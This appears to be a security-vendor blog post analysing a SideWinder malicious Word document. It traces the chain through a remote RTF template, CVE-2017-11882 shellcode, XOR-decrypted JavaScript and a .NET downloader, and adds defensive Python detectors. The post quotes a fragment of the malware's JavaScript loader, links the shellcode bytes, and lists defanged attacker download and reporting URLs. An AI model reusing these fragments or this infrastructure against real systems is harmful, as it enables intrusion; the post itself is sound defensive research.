# 404 — File still found
**[medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c](https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c)**
DCSO CyTec Blog April 15, 2022
In early February 2022, we came across a tweet from identifying a SideWinder-related Word document which referenced a template URL. In this article, we share our insights from investigating the file and the other infrastructure connected to it.
## First Look
[The file mentioned in the tweet](https://twitter.com/ShadowChasing1/status/1490984172797984770) is named ‘Briefing on Ongoing Projects.docx’ (eeeb99f94029fd366dcde7da2a75a849833c5f5932d8f1412a89ca15b9e9ebb7) and is available on [VirusTotal](https://www.virustotal.com/gui/file/eeeb99f94029fd366dcde7da2a75a849833c5f5932d8f1412a89ca15b9e9ebb7) and on our GitHub.
The document itself contains little information and appears empty aside from the address block. However, a deeper inspection of the document structure reveals that the document loads an RTF template from `https://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf`, which we assume represents the next stage of the attack. At the time of our analysis, this file was no longer available under the given URL, yet the domain still resolved to `185.255.17.46`.
After unpacking the document structure, we could locate the suspicious URL under the path _s. It generally refers to relations and in this case aims to download an RTF template, as shown in the code snippet below:
```
#
```
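A defender-side check for the remote-template technique described above, written as an added example for this article (not the authors' code): it builds a minimal docx in memory whose settings relationships point at an external template (assumed to live in `word/_rels/settings.xml.rels`, the usual place for an attachedTemplate relationship) and flags any such relationship that targets a URL.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Relationship type Word uses for an attached (remote) template; this is the hook the document abuses.
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
PR_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def find_remote_templates(docx_bytes):
    """Return (rels_part, url) pairs for attachedTemplate relationships that point at a URL."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % PR_NS):
                target = rel.get("Target", "")
                if (rel.get("Type") == ATTACHED_TEMPLATE
                        and rel.get("TargetMode") == "External"
                        and re.match(r"https?://", target, re.I)):
                    hits.append((name, target))
    return hits


# Constructed sample: a minimal docx skeleton whose settings relationships reference a remote
# template. The (defanged) URL is the one from the article, used here purely as sample data.
SAMPLE_RELS = (
    f'<Relationships xmlns="{PR_NS}">'
    f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" TargetMode="External" '
    'Target="https://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf"/>'
    "</Relationships>"
)


def build_sample_docx():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/settings.xml", "<settings/>")
        z.writestr("word/_rels/settings.xml.rels", SAMPLE_RELS)  # assumed location of the relationship
    return buf.getvalue()


if __name__ == "__main__":
    for part, url in find_remote_templates(build_sample_docx()):
        print(f"remote template in {part}: {url}")
```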
With the URL being dead, we went back to VirusTotal to use the graph feature. It indicates that file.rtf was indeed downloaded and provides the file's hash. Based on this, we continue our analysis by looking into file.rtf.
VirusTotal contact graph of ‘Briefing on Ongoing Projects.docx’
## file.rtf(1)
Our next step was to analyze the .rtf file with the hash available on [VirusTotal](https://www.virustotal.com/gui/file/1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a) and on our [GitHub](https://github.com/DCSO/Blog_CyTec/tree/main/404_file_still_found/rtf(1)_1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a).
Unfortunately, the content of the RTF file does not appear to be malicious, as it is only one line with fewer than ten characters. The complete content of the file is shown below:
```
{\rtf1 }
```
The file itself was first uploaded to VirusTotal on 2021-11-03 and had therefore already been online for quite some time. Yet it appears to be some kind of placeholder file. Checking the [listed relations of this file on VirusTotal](https://www.virustotal.com/gui/file/1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a/relations) clearly shows its relation to the analyzed document:
Relation between file.rtf and domains marked as malicious on VirusTotal
All domains listed in the screenshot above follow the same path pattern, which can be described as:
`<…>/0/0/0/m/files-/file.rtf`
From this information, we assume that the original malicious RTF file was replaced after the initial delivery with a placeholder file. This file is small in size and not rich in content, yet it is unique enough to lead to related attacker domains on VirusTotal, since it is not a default file. Reviewing all related domains on the list revealed that the domain `dgmp-paknavy.mod-pk[.]com` has relations to [another RTF file available on VirusTotal](https://www.virustotal.com/gui/file/4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588), which potentially could have been the file.rtf before replacement.
## file.rtf(2)
As mentioned above, our next step is to analyze another RTF file, which we will refer to as file.rtf(2). The file is available on [VirusTotal](https://www.virustotal.com/gui/file/4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588) and on our [GitHub](https://github.com/DCSO/Blog_CyTec/tree/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588).
A first look at the file is promising: the file size is 66.21 KB and it was initially submitted to VirusTotal on 2022-02-08. The file is indeed a valid Rich Text Format file and contains the three sections listed in the screenshot below.
The RTF file contains three sections
rtfobj reveals more information
As soon as we extracted the first object (1.a), we noticed that its hash was mentioned by [another researcher as part of the malicious document on Twitter](https://twitter.com/ayaz2hussain/status/1491340118229385216), reinforcing our assumption that this is the original file.rtf.
Besides 1.a, the RTF file contains another embedded object which is triggered via `\objupdate` when the document is loaded. This indicates the next execution step after ‘Briefing on Ongoing Projects.docx’ has loaded the RTF file.
Raw view of the embedded object triggered via \objupdate
The triggered code attempts to execute the embedded Equation Editor object, which has known vulnerabilities: CVE-2017-11882 (FONT), CVE-2018-0798 (MATRIX) and CVE-2018-0802 (FONT), as mentioned [here](https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018) and [here](https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-SaadRaggi.pdf).
The CVE listed for file.rtf(2) on VirusTotal is CVE-2017-11882, which indicates code execution based on an unchecked font name input length.
To verify this claim, we have created a 010 Editor template to parse the embedded object based on the protocol description of [OLE objects](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-oleds/3c695db0-943f-48a0-b134-939af3b3a4ca) and [MTEF objects](http://rtf2latex2e.sourceforge.net/MTEF3.html). We [share the template](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/010editor_template/ole_mtef_font.bt) on our GitHub page along with the analysis files. The parser now allows us to follow the execution flow further by extracting the initial exploit code contained in the FONT name section of the object.
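A small MTEF record walker, added here as an example and not the authors' 010 Editor template: it skips the MTEF header and size records and, for every FONT record, measures the name field, flagging names longer than a Windows face name can ever be. The 31-character threshold and the layout assumed for a flag-less LINE record are this example's assumptions; the input is the MTEF data that follows the EQNOLEFILEHDR in the Equation Native stream, which has to be extracted first (for instance with rtfobj, as above).

```python
MTEF_END, MTEF_LINE, MTEF_FONT = 0x00, 0x01, 0x08
# MTEF size records FULL, SUB, SUB2, SYM, SUBSYM (0x0A-0x0E) carry no payload.
MTEF_SIZE_RECORDS = range(0x0A, 0x0F)
# A Windows LOGFONT face name holds at most 31 characters plus a NUL, so a longer name
# can never be a real font name. Using that as the alert threshold is this example's choice.
MAX_FACE_NAME = 31


def parse_mtef_fonts(mtef):
    """Walk an MTEF v3 stream (the bytes after the 28-byte EQNOLEFILEHDR in the
    'Equation Native' stream) and return (tface, style, name, suspicious) per FONT record."""
    if len(mtef) < 5 or mtef[0] != 3:
        raise ValueError("not an MTEF v3 stream")
    pos, fonts = 5, []  # skip header: version, platform, product, version, subversion
    while pos < len(mtef):
        tag, options = mtef[pos] & 0x0F, mtef[pos] >> 4  # low nibble type, high nibble flags
        pos += 1
        if tag == MTEF_END:
            break
        if tag in MTEF_SIZE_RECORDS or (tag == MTEF_LINE and options == 0):
            continue  # no payload to skip; a LINE with flags set would carry nudge bytes (assumed)
        if tag == MTEF_FONT:
            tface, style = mtef[pos], mtef[pos + 1]
            pos += 2
            end = mtef.find(b"\x00", pos)
            name = mtef[pos:] if end < 0 else mtef[pos:end]
            pos = len(mtef) if end < 0 else end + 1
            fonts.append((tface, style, name, len(name) > MAX_FACE_NAME))
            continue
        break  # other records need layout-aware parsing; stop rather than misparse
    return fonts


def build_sample(font_name):
    """Constructed MTEF v3 stream: header, FULL size, LINE, FONT (tface/style 0x5A), END."""
    header = bytes([3, 1, 1, 3, 0x0A])
    records = bytes([0x0A, MTEF_LINE, MTEF_FONT, 0x5A, 0x5A]) + font_name + b"\x00"
    return header + records + bytes([MTEF_END])


if __name__ == "__main__":
    # The 44 'A's stand in for the shellcode the article extracted; they are not the real payload.
    for sample in (b"Times New Roman", b"A" * 44):
        for tface, style, name, suspicious in parse_mtef_fonts(build_sample(sample)):
            print(f"FONT tface={tface:#x} style={style:#x} len={len(name)} suspicious={suspicious}")
```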
Parsed OLE/MTEF object with overflowing FONT name containing shellcode (red)
After extracting and converting the shellcode via CyberChef, it becomes clear that the exploit code abuses the FONT name field. The exploit code ([code in CyberChef](https://gchq.github.io/CyberChef/#recipe=Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)&input=QkEgMzYgNjQgNkYgMUQgODEgQzIgMDYgNTkgRDYgRTIgOEIgMEEgOEIgMjkgQkYKQkMgNkIgMjIgQTYgODEgRjcgMEMgMEMgNjQgQTYgOEIgMTcgNTUgRkYgRDIgMDUKRDQgMTIgNzUgOTUgMkQgMDUgMTIgNzUgOTUgRkYgRTAK)) then triggers a loop ([code in CyberChef](https://gchq.github.io/CyberChef/#recipe=Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)&input=NTkgMzEgRDIgOEEgMUMgMTEgODAgRkIgMDAgNzQgMEEKODAgRjMgMTIgODggMUMgMTAgNDIgNDAgRUIgRUUgQzYgMDQgMTAgMDAgRUIgMUQKNUIgNTggQzYgMDAgNkIgQzYgNDAgMUUgNEMgQzYgNDAgMzggNDcgQzYgODAgQzgKMDAgMDAgMDAgNTIgNTAgNTMgRTkgRjUgMDAgMDAgMDAgOTAgOTAgOTA)) to decrypt embedded XOR-encrypted JavaScript code. The XOR key used in this case is 12.
The assembler code used for the exploit coincides with the findings in [this article](https://fastcall.medium.com/cve-2017-11882-rtf-44d671dc0fce). The disassembly for the exploit and the XOR decryption is shown below:
CyberChef disassembly of the exploit code
CyberChef disassembly of the XOR loop
The decrypted JavaScript code listed below executes the file 1.a, which is dropped to a temp
path when the RTF is loaded:
```
javascript:eval("sa=ActiveXObject;ab=new
sa(\"Scripting.FileSystemObject\");eval(ab.OpenTextFile(ab.GetSpecialFolder(2)+\"\\\\1
```
The 1.a file is stored on disk in obfuscated form in order to hinder automated analysis. We share the [obfuscated](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588/extracted/1.a) and [deobfuscated](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588/extracted/deobfuscated_1_a/1_a.js) file on GitHub.
On execution, the file deserialises an object, identifies installed antivirus software and appends it as a variable to a URL. The deserialised object is invoked by calling the function “work” with two slightly different URLs, which we assume are used for downloading the next stage and for error reporting.
The included URLs are listed below:
```
Next stage:      https://dgmp-paknavy.mod-pk[.]com/14325/1/10/3/1/1/1865884360/uAiXa3upVnbI8GnagA2EgfGUnQxzUvVIEq4r3YTr/files-f3046d06/1/
Error reporting: https://dgmp-paknavy.mod-pk[.]com/14325/1/10/3/3/0/1865884360/uAiXa3upVnbI8GnagA2EgfGUnQxzUvVIEq4r3YTr/files-984c52a9/0/data?d=
```
Next, we extracted the deserialised .NET object ([95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588/extracted/deobfuscated_1_a/extracted/95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb_dot_net.bin)) and decompiled it with ILSpy. Unsurprisingly, this file was obfuscated as well, so we provide the [obfuscated](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588/extracted/deobfuscated_1_a/extracted/95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb_dot_net.bin) and the [deobfuscated](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588/extracted/deobfuscated_1_a/extracted/deobfuscated/deobfuscated_program.cs) file on GitHub, too.
In general, the program evaluates the previously discovered antivirus software and reports it if available. If “work” is called with a local file path, the script executes the contained Windows shell commands by embedding them into a WshShell JavaScript object, which it executes via mshta.exe. If “work” is called with a URL, as seen in our sample, a file containing assembly commands is downloaded. It is then decrypted with a 32-bit key prepended to the file and executed. Notably, there are also error reporting capabilities: the program reports exceptions at different positions throughout its execution by appending an exception message to the URL before calling it.
During our analysis and validation, we found [related work analyzing similar malicious documents](https://ebryx.com/exposing-sidewinders-arsenal-against-windows-2/) which correspond to our sample. The article dissects the samples in depth and validates the attribution claim made in the initial tweet of our article. Based on the structure and the vulnerability used, this file seems to be related to the Royal Road v3 framework, as mentioned [here](https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/).
At this point, there were no clear indicators or hashes of the next execution stage, and we
therefore stopped following the execution path further.
## Attack Chain
Here, we summarize the execution flow of the file. The malicious document is opened by the victim and an RTF template file is then loaded. This RTF file contains the remote code execution exploit CVE-2017-11882, which abuses a FONT name vulnerability in the Equation Editor, triggered via an embedded Equation Editor object. The exploit executes a JavaScript file, previously written to disk through the RTF template, which then executes .NET code. This file downloads another stage, which is no longer available online. The ability to execute an already existing local file is implemented in the code, but is not used in this process flow.
Malicious execution flow of the document
## Placeholder files
As mentioned before, the nearly empty file.rtf(1) we initially found wasn't very useful in terms of content. We assume that the original file on the server was removed to protect the following stage by replacing it with a placeholder file. Yet, because the file is custom, it can be used as an identifier and establish a relationship between the attacks. In this case, we are able to link eight domains as shown below.
VirusTotal indicates communication between maldocs and the placeholder file
Based on the given relation on VirusTotal, the URLs of these eight domains all exhibit the same path pattern (`<…>/0/0/0/m/files-/file.rtf`), which supports the assumption of a possible connection between them.
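The path pattern can also serve as a proxy-log detection. This is an added example, not part of the original post: it parses constructed log lines, re-fangs the defanged URLs, and reports requests whose path matches the placeholder shape, returning the host and the files-<id> value so related requests can be clustered. Treating the prefix as exactly four numeric segments is this example's assumption.

```python
import re
from urllib.parse import urlsplit

# Path shape shared by the placeholder URLs in the article: four numeric segments, then
# /0/0/0/m/files-<8 hex>/file.rtf. Requiring exactly four numeric segments is this example's assumption.
PLACEHOLDER_PATH = re.compile(r"^(?:/\d+){4}(?:/0){3}/m/files-?([0-9a-f]{8})/file\.rtf$", re.I)

# Constructed proxy log lines (timestamp, client, method, URL, status); domains are defanged as in the article.
SAMPLE_PROXY_LOG = """\
2022-02-07T09:12:31Z 10.0.0.12 GET https://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf 404
2022-02-07T09:40:02Z 10.0.0.19 GET https://srilankanavy.ksew[.]org/5471/1/1101/2/0/0/0/m/files-cd6e6dbd/file.rtf 200
2022-02-07T10:01:45Z 10.0.0.12 GET https://example.com/templates/0/0/0/m/files-deadbeef/file.rtf 200
2022-02-07T10:05:09Z 10.0.0.33 GET https://example.org/docs/template.dotx 200
"""


def match_placeholder_url(url):
    """Return (host, file_id) if the URL follows the placeholder path pattern, else None."""
    parts = urlsplit(url.replace("[.]", "."))  # re-fang before parsing
    m = PLACEHOLDER_PATH.match(parts.path)
    return (parts.hostname, m.group(1).lower()) if m and parts.hostname else None


def scan_proxy_log(text):
    """Return a list of (timestamp, client, host, file_id) for requests matching the pattern."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line; the constructed format has five fields
        matched = match_placeholder_url(fields[3])
        if matched:
            hits.append((fields[0], fields[1], *matched))
    return hits


if __name__ == "__main__":
    for ts, client, host, file_id in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{ts} {client} -> {host} (files-{file_id})")
```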
A quick check of the domains led to related posts attributing the domains to the same APT,
shown in the list below.
In conclusion, this placeholder file creates a relationship between several different attacks,
supporting the attribution made by other researchers.
In addition, we checked the validity period of the TLS certificates on [crt.sh](https://crt.sh/) for the domains in question. The graphic below illustrates the validity periods of the relevant TLS certificates, and even though we can't be sure when exactly the attacks were carried out, we can at least narrow down the time frame.
Validity span of TLS certificates for each identified domain
## Conclusion
A sample attributed to SideWinder was published on Twitter. We analyzed the sample and followed related IoCs as far as possible. During this analysis, we found related work verifying the file structure and attribution. We also noticed that different SideWinder samples downloaded the same nearly empty RTF file, which we assume acts as a placeholder file after the original payload was delivered. This placeholder file is not a default file, which allowed us to identify related domains of this campaign.
All extracted and deobfuscated files can be downloaded from our GitHub repository DCSO CyTec.
## IoCs
[We provide a MISP event on our GitHub.](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/misp_event_0b671240-5c9a-4323-afff-b5fc8f632d46.json)